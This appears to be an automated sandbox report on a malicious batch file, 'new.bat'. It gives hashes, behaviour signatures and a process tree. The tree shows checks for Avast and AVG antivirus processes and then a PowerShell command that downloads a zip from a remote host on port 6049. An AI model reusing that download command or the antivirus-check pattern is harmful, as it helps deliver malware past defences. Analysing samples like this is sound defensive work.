Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    16-12-2024 17:23

General

  • Target

    new.bat

  • Size

    4KB

  • MD5

    b79e56969d36c4b969bbe1623142e74a

  • SHA1

    a7bcc5273b86e75dad66fed8fab1ec546ffa3bfd

  • SHA256

    6eb141225c4e4bfe3c347cac44b939ef697616b32e7d3646d6944210d99d0960

  • SHA512

    fb9df37d81d5a9e8fa4500db392df29c4e7e8017cb9705277da7e1a2f0eb3b9df529c657174488998ba5cb82fb51149d31e666190c6de7e86773ac8e7711a356

  • SSDEEP

    96:EDONgDQ901HqmgGM5olT539rHZdrMkSKHUEeW05qy:EDpDe01HqGO5j

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\new.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2848
    • C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq AvastUI.exe"
      2⤵
      • Enumerates processes with tasklist
      • Suspicious use of AdjustPrivilegeToken
      PID:2164
    • C:\Windows\system32\find.exe
      find /i "AvastUI.exe"
      2⤵
        PID:2656
      • C:\Windows\system32\tasklist.exe
        tasklist /FI "IMAGENAME eq avgui.exe"
        2⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:2700
      • C:\Windows\system32\find.exe
        find /i "avgui.exe"
        2⤵
          PID:2692
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://dbasopma.one:6049/bab.zip' -OutFile 'C:\Users\Admin\Downloads\downloaded.zip' } catch { exit 1 }"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2420

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/2420-4-0x000007FEF5E2E000-0x000007FEF5E2F000-memory.dmp

        Filesize

        4KB

      • memory/2420-5-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

        Filesize

        2.9MB

      • memory/2420-8-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

        Filesize

        9.6MB

      • memory/2420-7-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

        Filesize

        9.6MB

      • memory/2420-10-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

        Filesize

        9.6MB

      • memory/2420-9-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

        Filesize

        9.6MB

      • memory/2420-6-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

        Filesize

        32KB

      • memory/2420-11-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

        Filesize

        9.6MB

      • memory/2420-12-0x000007FEF5B70000-0x000007FEF650D000-memory.dmp

        Filesize

        9.6MB